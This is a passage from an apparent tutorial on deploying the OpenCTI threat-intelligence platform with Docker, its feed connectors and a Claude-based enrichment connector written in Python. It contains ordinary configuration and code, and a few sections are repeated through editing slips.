MINIO__ACCESS_KEY: ${MINIO_ROOT_USER:-opencti}<br>      MINIO__SECRET_KEY: ${MINIO_ROOT_PASSWORD:-CHANGE_ME}<br>      RABBITMQ__HOSTNAME: rabbitmq<br>      RABBITMQ__PORT: 5672<br>      RABBITMQ__USERNAME: ${RABBITMQ_DEFAULT_USER:-opencti}<br>      RABBITMQ__PASSWORD: ${RABBITMQ_DEFAULT_PASS:-CHANGE_ME}<br>      SMTP__HOSTNAME: localhost<br>      PROVIDERS__LOCAL__STRATEGY: LocalStrategy<br>    volumes:<br>      - ./patches/back.js:/opt/opencti/build/back.js:ro<br>    ports:<br>      - "8080:8080"<br>    depends_on:<br>      - redis<br>      - elasticsearch<br>      - minio<br>      - rabbitmq<br>    restart: always<br>  worker:<br>    image: opencti/worker:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      WORKER_LOG_LEVEL: error<br>    depends_on:<br>      - opencti<br>    deploy:<br>      mode: replicated<br>      replicas: 3<br>    restart: always<br>volumes:<br>  esdata:<br>  redisdata:<br>  miniodata:<br>  rabbitmqdata:<br>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><h4>7.4 Connectors — docker-compose.connectors.yml</h4><pre>nano docker-compose.connectors.yml</pre><pre>version: "3"<br>services:<br>  # MITRE ATT&amp;CK (no API key needed)<br>  connector-mitre:<br>    image: opencti/connector-mitre:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_MITRE_TOKEN}<br>      CONNECTOR_NAME: "MITRE ATT&amp;CK"<br>      CONNECTOR_SCOPE: "marking-definition,identity,attack-pattern,course-of-action,intrusion-set,campaign,malware,tool,vulnerability,x-mitre-matrix,x-mitre-tactic,x-mitre-collection"<br>      CONNECTOR_CONFIDENCE_LEVEL: 75<br>      CONNECTOR_UPDATE_EXISTING_DATA: "true"<br>      CONNECTOR_LOG_LEVEL: error<br>      MITRE_REMOVE_STATEMENT_MARKING: "true"<br>      MITRE_INTERVAL: 7  # days between full refresh<br>    restart: always<br>  # CVE / NVD Vulnerabilities<br>  connector-cve:<br>    image: opencti/connector-cve:6.2.0<br>    volumes:<br>      - ./patches/cve/api.py:/opt/opencti-connector-cve/services/client/api.py:ro<br>      - ./patches/cve/vulnerability.py:/opt/opencti-connector-cve/services/client/vulnerability.py:ro<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_CVE_TOKEN}<br>      CONNECTOR_NAME: "Common Vulnerabilities and Exposures"<br>      CONNECTOR_SCOPE: "identity,vulnerability"<br>      CONNECTOR_CONFIDENCE_LEVEL: 75<br>      CONNECTOR_LOG_LEVEL: info<br>      CONNECTOR_UPDATE_EXISTING_DATA: "true"<br>      CVE_BASE_URL: "https://services.nvd.nist.gov/rest/json/cves"<br>      CVE_API_KEY: ${NVD_API_KEY}<br>      CVE_MAX_DATE_RANGE: 120<br>      CVE_MAINTAIN_DATA: "true"<br>      CVE_INTERVAL: 2<br>    restart: always<br>  # AlienVault OTX<br>  connector-alienvault:<br>    image: opencti/connector-alienvault:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_ALIENVAULT_TOKEN}<br>      CONNECTOR_NAME: "AlienVault OTX"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 40<br>      CONNECTOR_LOG_LEVEL: error<br>      ALIENVAULT_BASE_URL: "https://otx.alienvault.com"<br>      ALIENVAULT_API_KEY: ${ALIENVAULT_API_KEY}<br>      ALIENVAULT_TLP: "White"<br>      ALIENVAULT_CREATE_OBSERVABLES: "true"<br>      ALIENVAULT_CREATE_INDICATORS: "true"<br>      ALIENVAULT_PULSE_START_TIMESTAMP: "2020-01-01T00:00:00"<br>      ALIENVAULT_REPORT_STATUS: "New"<br>      ALIENVAULT_REPORT_TYPE: "threat-report"<br>      ALIENVAULT_GUESS_MALWARE: "false"<br>      ALIENVAULT_GUESS_CVE: "false"<br>      ALIENVAULT_INTERVAL: 30   # minutes<br>    restart: always<br>  # Abuse.ch SSL Blacklist<br>  connector-abuse-ssl:<br>    image: opencti/connector-abuse-ssl:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_MALWAREBAZAAR_TOKEN}<br>      CONNECTOR_NAME: "Abuse.ch SSL Blacklist"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 50<br>      CONNECTOR_LOG_LEVEL: error<br>      ABUSE_SSL_URL: "https://sslbl.abuse.ch/blacklist/sslblacklist.csv"<br>      ABUSE_SSL_INTERVAL: 30  # minutes<br>    restart: always<br>  # Abuse.ch URLhaus<br>  connector-urlhaus:<br>    image: opencti/connector-urlhaus:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_URLHAUS_TOKEN}<br>      CONNECTOR_NAME: "Abuse.ch URLhaus"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 40<br>      CONNECTOR_LOG_LEVEL: error<br>      URLHAUS_CSV_URL: "https://urlhaus.abuse.ch/downloads/csv_recent/"<br>      URLHAUS_IMPORT_OFFLINE: "true"<br>      URLHAUS_INTERVAL: 2  # hours<br>    restart: always<br>  connector-threatfox:<br>    image: opencti/connector-threatfox:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_THREATFOX_TOKEN}<br>      CONNECTOR_NAME: "ThreatFox"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 40<br>      CONNECTOR_LOG_LEVEL: error<br>      THREATFOX_API_URL: "https://threatfox-api.abuse.ch/api/v1/"<br>      THREATFOX_CREATE_INDICATORS: "true"<br>      THREATFOX_CREATE_OBSERVABLES: "true"<br>      THREATFOX_INTERVAL: 3<br>    restart: always<br>  connector-import-document:<br>    image: opencti/connector-import-document:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_IMPORT_DOCUMENT_TOKEN}<br>      CONNECTOR_NAME: "ImportDocument"<br>      CONNECTOR_SCOPE: "application/pdf,text/plain,text/html"<br>      CONNECTOR_AUTO: "true"<br>      CONNECTOR_CONFIDENCE_LEVEL: 75<br>      CONNECTOR_LOG_LEVEL: error<br>    restart: always<br>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><h4>7.5 AI Enrichment Connector — docker-compose.ai.yml</h4><pre>nano docker-compose.ai.yml</pre><pre>version: "3"<br><br>services:<br>  connector-ai-enrichment:<br>    build:<br>      context: ./connectors/ai-enrichment<br>      dockerfile: Dockerfile<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_AI_ENRICHMENT_TOKEN}<br>      CONNECTOR_NAME: "AI Enrichment (Claude)"<br>      CONNECTOR_LOG_LEVEL: info<br>      ANTHROPIC_API_KEY: ${ANTHROPIC_API_KEY}<br>      AI_MODEL: claude-opus-4-7<br>      AI_ENRICHMENT_REPORTS: "true"<br>      AI_ENRICHMENT_MALWARE: "true"<br>      AI_ENRICHMENT_THREAT_ACTORS: "true"<br>    restart: always<br><br>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><h3>8. Connector Configuration</h3><h4>Fast Start / Stop Scripts</h4><p>The repository includes two helper scripts for daily operations:</p><pre># Start core OpenCTI, wait for the UI/API, then start connectors and AI enrichment<br>./scripts/start-all.sh<br># Stop AI enrichment, connectors, and core OpenCTI while preserving Docker volumes<br>./scripts/stop-all.sh</pre><p>Use these scripts for normal start/stop operations after .env is configured. Use the manual commands below when debugging a specific service startup problem.</p><pre>nano start-all.sh</pre><pre>#!/usr/bin/env bash<br>set -euo pipefail<br><br>ROOT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." &amp;&amp; pwd)"<br>cd "$ROOT_DIR"<br><br>WAIT_TIMEOUT="${WAIT_TIMEOUT:-300}"<br><br>wait_for_opencti() {<br>  local deadline=$((SECONDS + WAIT_TIMEOUT))<br><br>  echo "[start] Waiting for OpenCTI API on http://localhost:8080..."<br>  until curl -fsS http://localhost:8080 &gt;/dev/null 2&gt;&amp;1; do<br>    if (( SECONDS &gt;= deadline )); then<br>      echo "[start] OpenCTI did not become reachable within ${WAIT_TIMEOUT}s." &gt;&amp;2<br>      echo "[start] Check logs with: docker compose logs -f opencti" &gt;&amp;2<br>      return 1<br>    fi<br>    sleep 5<br>  done<br>}<br><br>echo "[start] Starting OpenCTI core stack..."<br>docker compose -f docker-compose.yml up -d<br><br>wait_for_opencti<br><br>echo "[start] Starting external connectors..."<br>docker compose -f docker-compose.connectors.yml up -d<br><br>echo "[start] Building and starting AI enrichment connector..."<br>docker compose -f docker-compose.ai.yml up -d --build<br><br>echo "[start] Done."<br>docker compose -f docker-compose.yml ps</pre><pre>nano stop-all.sh</pre><pre>#!/usr/bin/env bash<br>set -euo pipefail<br><br>ROOT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." &amp;&amp; pwd)"<br>cd "$ROOT_DIR"<br><br>echo "[stop] Stopping OpenCTI core, connectors, and AI enrichment..."<br>docker compose \<br>  -f docker-compose.yml \<br>  -f docker-compose.connectors.yml \<br>  -f docker-compose.ai.yml \<br>  down --remove-orphans<br><br>echo "[stop] Done. Volumes are preserved."</pre><h4>8.1 Start the Core Stack</h4><pre>cd /home/andrey/openCTI<br><br># Pre-flight: ElasticSearch refuses allocation above 90% disk usage<br>df -h /var/lib/docker<br># If &gt; 90% full, run: docker system prune -a   (frees ~47 GB of unused images)<br><br># Create the shared Docker network (idempotent — safe to re-run)<br>docker network create opencti_network 2&gt;/dev/null || true<br><br># Start core services<br>docker compose -f docker-compose.yml up -d<br><br># Wait for ElasticSearch to be healthy before OpenCTI finishes initializing<br>until curl -s -u "elastic:${ELASTIC_PASSWORD}" \<br>  http://localhost:9200/_cluster/health | grep -q '"status":"green"\|"status":"yellow"'; do<br>  echo "Waiting for ES..."; sleep 5<br>done<br><br># Watch logs — first-run index creation takes 5-10 minutes<br># Look for "Listening on port 8080"<br>docker compose -f docker-compose.yml logs -f opencti | grep -E "Listening|ERROR|indices"</pre><h4>8.2 Start Connectors</h4><pre># Start feed connectors (after OpenCTI is healthy)<br>docker compose -f docker-compose.connectors.yml up -d<br># Verify connectors registered (wait ~60s for startup)<br>docker compose -f docker-compose.connectors.yml ps</pre><h4>8.3 Verify in UI</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*bgDghte5c5Hd2tKbutvP8A.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fIQLlAGqYjzNesmSnRw2QQ.png"></figure><pre>http://localhost:8080<br>Login: admin@opencti.local / &lt;your password&gt;Navigation:<br>  Data → Connectors → check all show status "connected"<br>  Knowledge → Malwares → should start populating within minutes<br>  Activities → Logs → watch ingest events</pre><h3>9. AI-Driven Enrichment Pipeline</h3><h4>Overview</h4><p>The AI enrichment pipeline adds a Claude-powered layer on top of the standard OpenCTI ingestion flow. Every time a connector (AlienVault, MITRE, URLhaus, etc.) writes a new object into OpenCTI, an event is published to RabbitMQ. The AI connector subscribes to that event stream, calls the Claude API with the object’s content, and writes the extracted structured intelligence back into the graph as STIX relationships, notes, and entity updates — all automatically.</p><p><strong>Without AI enrichment:</strong></p><pre>AlienVault pulse → Report object in OpenCTI<br>                   (raw text, no relationships, no ATT&amp;CK mapping)</pre><p><strong>With AI enrichment:</strong></p><pre>AlienVault pulse → Report object in OpenCTI<br>                       ↓ AI connector picks it up from event stream<br>                   Claude API: extract entities, map techniques, score severity<br>                       ↓<br>                   Report now has:<br>                   ├── Note: executive summary (2-3 sentences)<br>                   ├── Relationship → ThreatActor (if found in graph)<br>                   ├── Relationship → Malware (if found in graph)<br>                   ├── Relationship → AttackPattern T1059.001 (created if missing)<br>                   └── x_opencti_score updated based on AI confidence</pre><h4>9.1 How the Event Stream Works</h4><p>OpenCTI uses RabbitMQ as its internal message bus. Every write operation (create, update, delete) on any STIX object publishes a message to a topic exchange. Connectors subscribe to this exchange via pycti's OpenCTIConnectorHelper.listen() method.</p><pre>OpenCTI platform<br>      │<br>      │ write event (STIX bundle)<br>      ▼<br>  RabbitMQ<br>  exchange: amq.topic<br>      │<br>      ├──► worker-1 (standard workers — write to ES/graph)<br>      ├──► worker-2<br>      ├──► worker-3<br>      └──► connector-ai-enrichment  ← our connector subscribes here<br>                  │<br>                  │ reads event payload:<br>                  │ {<br>                  │   "type": "create",<br>                  │   "data": { "id": "report--uuid", "type": "report", ... }<br>                  │ }<br>                  ▼<br>            calls Claude API<br>                  ▼<br>            writes enrichment back via GraphQL API</pre><p>Each message contains the full STIX object that was just created. The connector processes it and acknowledges the message — if it crashes mid-processing, RabbitMQ redelivers it.</p><p><strong>Connector type </strong><strong>INTERNAL_ENRICHMENT</strong> means:</p><ul><li>It does not import data on a schedule</li><li>It reacts to existing objects as they are created or updated</li><li>It appears in Settings → Connectors → Enrichment in the UI</li></ul><h4>9.2 Rules Engine (CE Automation)</h4><p><strong>Note:</strong> Playbooks are an Enterprise Edition feature. The Community Edition uses the built-in Rules Engine, which automatically infers and propagates relationships as data arrives.</p><p>All 20 rules are enabled. To verify or toggle: <strong>Settings → Customization → Rules</strong></p><p>To enable all rules via API (already done — included for re-initialization):</p><pre>RULES="attribution_attribution attribution_targets indicate_sighted attribution_use \<br>localization_of_targets location_location location_targets participate-to_parts \<br>observable_related observe_sighting part_part part-of_targets sighting_incident \<br>sighting_observable sighting_indicator report_ref_identity_part_of \<br>report_ref_indicator_based_on report_ref_observable_based_on \<br>report_ref_location_located_at parent_technique_use"<br>TOKEN=$(grep OPENCTI_ADMIN_TOKEN /home/andrey/openCTI/.env | cut -d= -f2)<br>for rule in $RULES; do<br>  curl -s -X POST http://localhost:8080/graphql \<br>    -H "Authorization: Bearer $TOKEN" \<br>    -H "Content-Type: application/json" \<br>    -d "{\"query\":\"mutation { ruleSetActivation(id: \\\"$rule\\\", enable: true) { id activated } }\"}" \<br>    | python3 -c "import sys,json; d=json.load(sys.stdin); print('$rule:', d['data']['ruleSetActivation']['activated'])"<br>done</pre><p><strong>What these rules do automatically once data arrives:</strong></p><p>RuleEffectattribution_attributionIf APT-X is attributed to Country-A, and APT-Y is a sub-group of APT-X → APT-Y also attributed to Country-Asighting_incidentIf an indicator is sighted, automatically raise an Incidentindicate_sightedIf indicator is sighted → infer the targeted entity from the indicator's relationshipreport_ref_indicator_based_onIf a Report references Observable X, and X has an Indicator → auto-link the Indicator to the Reportobservable_relatedIf two objects share a common Observable → infer a related-to relationshipparent_technique_useIf a sub-technique (T1059.001) is used → auto-link parent technique (T1059) as used</p><p><strong>For custom event-driven automation in CE</strong>, use a pycti script or the AI connector (section 9.1). The pycti library supports streaming the live event feed via helper.listen() — the AI connector in 9.1 uses exactly this pattern.10. Post-Deployment Hardening</p><h4>9.2 What Claude Extracts and How It Maps to STIX</h4><p>The connector sends the report’s description text to Claude with a structured prompt. Claude returns JSON. The connector then maps each field to STIX operations:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*f1BfkVeUO3Qlt9Kj6-MkFg.png"></figure><p>Claude output fieldSTIX actionsummaryCreates a Note object attached to the report (object_refs)threat_actors[]Looks up ThreatActor by name in graph → creates related-to relationship to reportmalware_families[]Looks up Malware by name → creates related-to relationship to reportattack_techniques[]Looks up AttackPattern by external_id (T1059.001) → creates uses relationship to reporttargeted_sectors[]Looks up Identity (sector) → creates targets relationshiptargeted_countries[]Looks up Location by ISO code → creates targets relationshipconfidenceSets x_opencti_score on the report (0–100)</p><p><strong>Why look up instead of creating?</strong> MITRE ATT&amp;CK and identity data is already loaded by the MITRE connector. Looking up prevents duplicates. Only AttackPattern objects are created if missing (since Claude may identify techniques not yet in the graph).</p><h4>9.3 Connector Code</h4><pre>mkdir -p /home/andrey/openCTI/connectors/ai-enrichment</pre><p><a href="https://infosecwriteups.com/connectors/ai-enrichment/connector.py"><strong>connectors/ai-enrichment/connector.py</strong></a></p><pre>import os<br>import json<br>import time<br>import anthropic<br>from pycti import OpenCTIConnectorHelper<br><br>SYSTEM_PROMPT = """You are a senior cyber threat intelligence analyst.<br>Analyze threat intelligence content and return structured JSON only.<br>No prose, no markdown fences, no explanation — raw JSON."""<br><br>REPORT_PROMPT = """Analyze this threat intelligence report. Return JSON with exactly these keys:<br>- summary: string (2-3 sentence executive brief, plain text)<br>- threat_actors: list of strings (actor names, aliases, groups mentioned)<br>- malware_families: list of strings (malware/tool names)<br>- attack_techniques: list of strings (MITRE ATT&amp;CK IDs only, e.g. ["T1059.001", "T1003"])<br>- targeted_sectors: list of strings (e.g. ["Finance", "Healthcare", "Government"])<br>- targeted_countries: list of strings (ISO 3166-1 alpha-2, e.g. ["US", "UA", "DE"])<br>- confidence: integer 0-100<br><br>Report:<br>{content}"""<br><br>INTRUSION_SET_PROMPT = """Analyze this threat actor / intrusion set profile. Return JSON with exactly these keys:<br>- summary: string (2-3 sentence executive brief)<br>- aliases: list of strings (other known names)<br>- malware_families: list of strings (malware/tools this actor uses)<br>- attack_techniques: list of strings (MITRE ATT&amp;CK IDs, e.g. ["T1059.001", "T1003"])<br>- targeted_sectors: list of strings (sectors this actor targets)<br>- targeted_countries: list of strings (ISO 3166-1 alpha-2 codes)<br>- motivation: string (one of: "espionage", "financial", "hacktivism", "destruction", "unknown")<br>- sophistication: string (one of: "minimal", "intermediate", "advanced", "expert", "unknown")<br>- confidence: integer 0-100<br><br>Profile:<br>{content}"""<br><br><br>class AIEnrichmentConnector:<br>    def __init__(self):<br>        config = {<br>            "opencti": {<br>                "url": os.environ.get("OPENCTI_URL", "http://opencti:8080"),<br>                "token": os.environ["OPENCTI_TOKEN"],<br>            },<br>            "connector": {<br>                "id": os.environ["CONNECTOR_ID"],<br>                "type": "INTERNAL_ENRICHMENT",<br>                "name": os.environ.get("CONNECTOR_NAME", "AI Enrichment (Claude)"),<br>                "scope": "Report,Intrusion-Set,Threat-Actor-Group,Malware",<br>                "log_level": os.environ.get("CONNECTOR_LOG_LEVEL", "info"),<br>                "auto": False,<br>            },<br>        }<br>        self.helper = OpenCTIConnectorHelper(config)<br>        self.client = anthropic.Anthropic(api_key=os.environ["ANTHROPIC_API_KEY"])<br>        self.model = os.environ.get("AI_MODEL", "claude-opus-4-7")<br><br>    # -------------------------------------------------------------------------<br>    # Claude call with retry on rate limit<br>    # -------------------------------------------------------------------------<br><br>    def _call_claude(self, prompt_template: str, content: str) -&gt; dict | None:<br>        for attempt in range(3):<br>            try:<br>                msg = self.client.messages.create(<br>                    model=self.model,<br>                    max_tokens=2048,<br>                    system=SYSTEM_PROMPT,<br>                    messages=[{"role": "user", "content": prompt_template.format(content=content[:8000])}],<br>                )<br>                return json.loads(msg.content[0].text)<br>            except anthropic.RateLimitError:<br>                wait = 60 * (attempt + 1)<br>                self.helper.log_warning(f"Rate limited — waiting {wait}s")<br>                time.sleep(wait)<br>            except (json.JSONDecodeError, anthropic.APIError) as e:<br>                self.helper.log_error(f"Claude call failed: {e}")<br>                return None<br>        return None<br><br>    # -------------------------------------------------------------------------<br>    # STIX write-back helpers<br>    # -------------------------------------------------------------------------<br><br>    def _add_note(self, entity_id: str, summary: str, confidence: int) -&gt; None:<br>        self.helper.api.note.create(<br>            abstract="AI Summary",<br>            content=summary,<br>            confidence=confidence,<br>            object_ids=[entity_id],<br>        )<br><br>    def _link_threat_actors(self, entity_id: str, names: list, confidence: int) -&gt; None:<br>        for name in names:<br>            actor = self.helper.api.threat_actor_group.read(<br>                filters={"mode": "and", "filters": [{"key": "name", "values": [name]}], "filterGroups": []}<br>            )<br>            if actor:<br>                self.helper.api.stix_core_relationship.create(<br>                    fromId=entity_id,<br>                    toId=actor["id"],<br>                    relationship_type="related-to",<br>                    confidence=confidence,<br>                )<br><br>    def _link_malware(self, entity_id: str, names: list, confidence: int) -&gt; None:<br>        for name in names:<br>            malware = self.helper.api.malware.read(<br>                filters={"mode": "and", "filters": [{"key": "name", "values": [name]}], "filterGroups": []}<br>            )<br>            if malware:<br>                self.helper.api.stix_core_relationship.create(<br>                    fromId=entity_id,<br>                    toId=malware["id"],<br>                    relationship_type="uses",<br>                    confidence=confidence,<br>                )<br><br>    def _link_attack_patterns(self, entity_id: str, technique_ids: list, confidence: int) -&gt; None:<br>        for tid in technique_ids:<br>            pattern = self.helper.api.attack_pattern.read(<br>                filters={"mode": "and", "filters": [{"key": "x_mitre_id", "values": [tid]}], "filterGroups": []}<br>            )<br>            if not pattern:<br>                pattern = self.helper.api.attack_pattern.create(<br>                    name=tid,<br>                    x_mitre_id=tid,<br>                    confidence=50,<br>                )<br>            if pattern:<br>                self.helper.api.stix_core_relationship.create(<br>                    fromId=entity_id,<br>                    toId=pattern["id"],<br>                    relationship_type="uses",<br>                    confidence=confidence,<br>                )<br><br>    def _update_score(self, entity_id: str, confidence: int) -&gt; None:<br>        self.helper.api.stix_domain_object.update_field(<br>            id=entity_id,<br>            input={"key": "x_opencti_score", "value": str(confidence)},<br>        )<br><br>    # -------------------------------------------------------------------------<br>    # Enrichment handlers per entity type<br>    # -------------------------------------------------------------------------<br><br>    def _enrich_report(self, report: dict) -&gt; str:<br>        content = report.get("description") or ""<br>        if len(content) &lt; 50:<br>            content = report.get("name", "")<br>        if not content or len(content) &lt; 10:<br>            return "Skipped: content too short"<br><br>        self.helper.log_info(f"Enriching report: {report['name']}")<br>        result = self._call_claude(REPORT_PROMPT, content)<br>        if not result:<br>            return "Skipped: Claude error"<br><br>        confidence = result.get("confidence", 50)<br>        entity_id = report["id"]<br><br>        if result.get("summary"):<br>            self._add_note(entity_id, result["summary"], confidence)<br>        if result.get("threat_actors"):<br>            self._link_threat_actors(entity_id, result["threat_actors"], confidence)<br>        if result.get("malware_families"):<br>            self._link_malware(entity_id, result["malware_families"], confidence)<br>        if result.get("attack_techniques"):<br>            self._link_attack_patterns(entity_id, result["attack_techniques"], confidence)<br><br>        self._update_score(entity_id, confidence)<br>        self.helper.log_info(f"Enriched report '{report['name']}'")<br>        return "Enriched"<br><br>    def _enrich_intrusion_set(self, entity: dict) -&gt; str:<br>        content = entity.get("description") or entity.get("name", "")<br>        if not content or len(content) &lt; 10:<br>            return "Skipped: content too short"<br><br>        self.helper.log_info(f"Enriching intrusion set: {entity['name']}")<br>        result = self._call_claude(INTRUSION_SET_PROMPT, content)<br>        if not result:<br>            return "Skipped: Claude error"<br><br>        confidence = result.get("confidence", 50)<br>        entity_id = entity["id"]<br><br>        if result.get("summary"):<br>            self._add_note(entity_id, result["summary"], confidence)<br>        if result.get("malware_families"):<br>            self._link_malware(entity_id, result["malware_families"], confidence)<br>        if result.get("attack_techniques"):<br>            self._link_attack_patterns(entity_id, result["attack_techniques"], confidence)<br><br>        self.helper.log_info(f"Enriched intrusion set '{entity['name']}'")<br>        return "Enriched"<br><br>    # -------------------------------------------------------------------------<br>    # Event handler<br>    # -------------------------------------------------------------------------<br><br>    def process_message(self, data: dict) -&gt; str:<br>        entity_type = data.get("entity_type", "").lower()<br>        entity_id = data.get("entity_id")<br>        enrichment_entity = data.get("enrichment_entity", {})<br><br>        self.helper.log_info(f"Received entity_type='{entity_type}' id='{entity_id}'")<br><br>        if not entity_id:<br>            return "Skipped"<br><br>        entity = enrichment_entity or {}<br><br>        if entity_type == "report":<br>            if not entity:<br>                entity = self.helper.api.report.read(id=entity_id) or {}<br>            if entity.get("confidence", 0) &lt; 40:<br>                return "Skipped: low confidence"<br>            return self._enrich_report(entity)<br><br>        if entity_type in ("intrusion-set", "threat-actor-group"):<br>            if not entity:<br>                entity = self.helper.api.intrusion_set.read(id=entity_id) or {}<br>            if not entity:<br>                return "Not found"<br>            return self._enrich_intrusion_set(entity)<br><br>        if entity_type == "malware":<br>            if not entity:<br>                entity = self.helper.api.malware.read(id=entity_id) or {}<br>            if not entity:<br>                return "Not found"<br>            content = entity.get("description") or entity.get("name", "")<br>            if not content or len(content) &lt; 10:<br>                return "Skipped: content too short"<br>            self.helper.log_info(f"Enriching malware: {entity['name']}")<br>            result = self._call_claude(REPORT_PROMPT, content)<br>            if not result:<br>                return "Skipped: Claude error"<br>            confidence = result.get("confidence", 50)<br>            if result.get("summary"):<br>                self._add_note(entity["id"], result["summary"], confidence)<br>            if result.get("attack_techniques"):<br>                self._link_attack_patterns(entity["id"], result["attack_techniques"], confidence)<br>            self._update_score(entity["id"], confidence)<br>            return "Enriched"<br><br>        return "Skipped"<br><br>    def start(self):<br>        self.helper.log_info("AI Enrichment connector starting...")<br>        self.helper.listen(self.process_message)<br><br><br>if __name__ == "__main__":<br>    AIEnrichmentConnector().start()</pre><p><a href="https://infosecwriteups.com/connectors/ai-enrichment/Dockerfile"><strong>connectors/ai-enrichment/Dockerfile</strong></a></p><pre>FROM python:3.11-slim<br>WORKDIR /app<br>COPY requirements.txt .<br>RUN pip install --no-cache-dir -r requirements.txt<br>COPY connector.py .<br>CMD ["python", "connector.py"]</pre><p><a href="https://infosecwriteups.com/connectors/ai-enrichment/requirements.txt"><strong>connectors/ai-enrichment/requirements.txt</strong></a></p><pre>pycti&gt;=6.2.0<br>anthropic&gt;=0.40.0</pre><h4>9.4 Deploy the AI Connector</h4><p><strong>Prerequisites:</strong> Set ANTHROPIC_API_KEY in .env first.</p><pre>cd /home/andrey/openCTI<br># Build the image<br>docker compose -f docker-compose.ai.yml build<br># Start it<br>docker compose -f docker-compose.ai.yml up -d<br># Verify it registered with OpenCTI (look for "AI Enrichment" in connector list)<br>docker logs opencti-connector-ai-enrichment-1 --tail=20</pre><p>In the OpenCTI UI: <strong>Settings → Connectors → Enrichment</strong> — the connector should appear with status connected after ~10 seconds.</p><h4>9.5 Testing the Pipeline</h4><p>Trigger a manual enrichment by importing a real threat report:</p><pre># Import a STIX report via the API to trigger the connector<br>curl -s -X POST http://localhost:8080/graphql \<br>  -H "Authorization: Bearer $(grep OPENCTI_ADMIN_TOKEN .env | cut -d= -f2)" \<br>  -H "Content-Type: application/json" \<br>  -d '{<br>    "query": "mutation { reportAdd(input: { name: \"Test: APT29 spearphishing campaign\", description: \"APT29, also known as Cozy Bear, conducted a spearphishing campaign targeting NATO members using a malicious PDF dropper that installed Cobalt Strike beacon via PowerShell (T1059.001). The campaign targeted defense contractors in Poland and Germany. The malware communicated with C2 over HTTPS using domain fronting (T1090.004).\", published: \"2024-01-15T00:00:00Z\", report_types: [\"threat-report\"] }) { id name } }"<br>  }'</pre><p>Then check what the AI connector wrote back:</p><pre># Watch connector logs for the enrichment<br>docker logs -f opencti-connector-ai-enrichment-1 2&gt;&amp;1 | grep -E "Enriching|Enriched|Error"<br># Expected output:<br># Enriching report: Test: APT29 spearphishing campaign<br># Enriched: 1 actors, 1 malware, 2 techniques</pre><p>In the UI, open the report — it should now have a Note with the summary, relationships to APT29 and Cobalt Strike, and links to T1059.001 and T1090.004.</p><h4>9.6 Cost and Rate Limiting</h4><p><strong>Estimated Claude API cost per report:</strong></p><ul><li>~500–2000 tokens input (report text, truncated at 8000 chars)</li><li>~300 tokens output (JSON response)</li><li>At claude-opus-4-7 pricing: ~$0.01–0.05 per report</li></ul><p><strong>Rate limiting:</strong> The Anthropic API has per-minute token limits. If AlienVault imports hundreds of reports in a burst, the connector will hit rate limits. Add a simple backoff:</p><pre>import time<br>def _call_claude(self, content: str) -&gt; dict | None:<br>    for attempt in range(3):<br>        try:<br>            msg = self.client.messages.create(...)<br>            return json.loads(msg.content[0].text)<br>        except anthropic.RateLimitError:<br>            time.sleep(60 * (attempt + 1))<br>        except (json.JSONDecodeError, anthropic.APIError) as e:<br>            self.helper.log_error(f"Claude call failed: {e}")<br>            return None<br>    return None</pre><p><strong>To limit scope</strong> (only enrich reports above a confidence threshold, skip low-quality feeds):</p><pre>def process_message(self, data: dict) -&gt; str:<br>    report = self.helper.api.report.read(id=entity_id)<br>    # Skip reports with low confidence (e.g. AlienVault auto-generated)<br>    if report.get("confidence", 0) &lt; 40:<br>        return "Skipped: low confidence"<br>    return self._enrich_report(report)</pre><h4>9.7 Rules Engine (CE Automation)</h4><p><strong>Note:</strong> Playbooks are an Enterprise Edition feature. The Community Edition uses the built-in Rules Engine, which automatically infers and propagates relationships as data arrives.</p><p>All 20 rules are enabled. To verify or toggle: <strong>Settings → Customization → Rules</strong></p><p>To enable all rules via API (already done — included for re-initialization):</p><pre>RULES="attribution_attribution attribution_targets indicate_sighted attribution_use \<br>localization_of_targets location_location location_targets participate-to_parts \<br>observable_related observe_sighting part_part part-of_targets sighting_incident \<br>sighting_observable sighting_indicator report_ref_identity_part_of \<br>report_ref_indicator_based_on report_ref_observable_based_on \<br>report_ref_location_located_at parent_technique_use"<br>TOKEN=$(grep OPENCTI_ADMIN_TOKEN 